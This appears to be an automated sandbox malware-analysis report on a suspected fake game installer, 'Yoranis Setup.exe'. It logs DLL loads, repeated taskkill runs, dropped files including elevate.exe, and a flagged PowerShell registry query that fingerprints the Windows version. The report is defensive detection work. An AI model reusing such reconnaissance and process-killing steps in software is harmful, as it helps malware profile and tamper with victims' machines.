Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq YoransSetup.exe" /FO csv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\b4a0680f-9ee1-57b1-adfd-e68812be32d6Jump to behavior
Source: Yoranis Setup.exeStatic file information: File size 87733089 > 1048576
Source: Yoranis Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\projects\src\out\Default\dxcompiler.dll.pdb source: Yoranis Setup.exe, 00000000.00000003.330047764144.0000000007A01000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductNameJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: dxil.dll.0.drStatic PE information: 0x7DBE8527 [Fri Nov 7 02:32:07 2036 UTC]
Source: dxcompiler.dll.0.drStatic PE information: section name: .00cfg
Source: dxcompiler.dll.0.drStatic PE information: section name: .gxfg
Source: dxcompiler.dll.0.drStatic PE information: section name: .retplne
Source: dxcompiler.dll.0.drStatic PE information: section name: _RDATA
Source: dxil.dll.0.drStatic PE information: section name: _RDATA
Source: ffmpeg.dll.0.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll.0.drStatic PE information: section name: .00cfg
Source: libEGL.dll.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll.0.drStatic PE information: section name: .retplne
Source: libEGL.dll.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll.0.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.0.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.0.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.0.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.0.drStatic PE information: section name: _RDATA
Source: YoransSetup.exe.0.drStatic PE information: section name: .00cfg
Source: YoransSetup.exe.0.drStatic PE information: section name: .gxfg
Source: YoransSetup.exe.0.drStatic PE information: section name: .retplne
Source: YoransSetup.exe.0.drStatic PE information: section name: .rodata
Source: YoransSetup.exe.0.drStatic PE information: section name: CPADinfo
Source: YoransSetup.exe.0.drStatic PE information: section name: LZMADEC
Source: YoransSetup.exe.0.drStatic PE information: section name: _RDATA
Source: YoransSetup.exe.0.drStatic PE information: section name: malloc_h
Source: dxcompiler.dll0.0.drStatic PE information: section name: .00cfg
Source: dxcompiler.dll0.0.drStatic PE information: section name: .gxfg
Source: dxcompiler.dll0.0.drStatic PE information: section name: .retplne
Source: dxcompiler.dll0.0.drStatic PE information: section name: _RDATA
Source: dxil.dll0.0.drStatic PE information: section name: _RDATA
Source: ffmpeg.dll0.0.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll0.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll0.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll0.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll0.0.drStatic PE information: section name: .00cfg
Source: libEGL.dll0.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll0.0.drStatic PE information: section name: .retplne
Source: libEGL.dll0.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll0.0.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll0.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll0.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll0.0.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll0.0.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll0.0.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll0.0.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll0.0.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll0.0.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll0.0.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll0.0.drStatic PE information: section name: .retplne
Source: vulkan-1.dll0.0.drStatic PE information: section name: _RDATA
Source: YoransSetup.exe0.0.drStatic PE information: section name: .00cfg
Source: YoransSetup.exe0.0.drStatic PE information: section name: .gxfg
Source: YoransSetup.exe0.0.drStatic PE information: section name: .retplne
Source: YoransSetup.exe0.0.drStatic PE information: section name: .rodata
Source: YoransSetup.exe0.0.drStatic PE information: section name: CPADinfo
Source: YoransSetup.exe0.0.drStatic PE information: section name: LZMADEC
Source: YoransSetup.exe0.0.drStatic PE information: section name: _RDATA
Source: YoransSetup.exe0.0.drStatic PE information: section name: malloc_h
Source: node.napi.node0.0.drStatic PE information: section name: _RDATA
Source: registry.node.0.drStatic PE information: section name: .fptable
Source: node_sqlite3.node.0.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\YoransSetup.exeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-js\build\Release\registry.nodeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Programs\unrealgame\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Programs\unrealgame\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Programs\unrealgame\dxil.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Programs\unrealgame\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\SpiderBanner.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\StdUtils.dllJump to dropped file
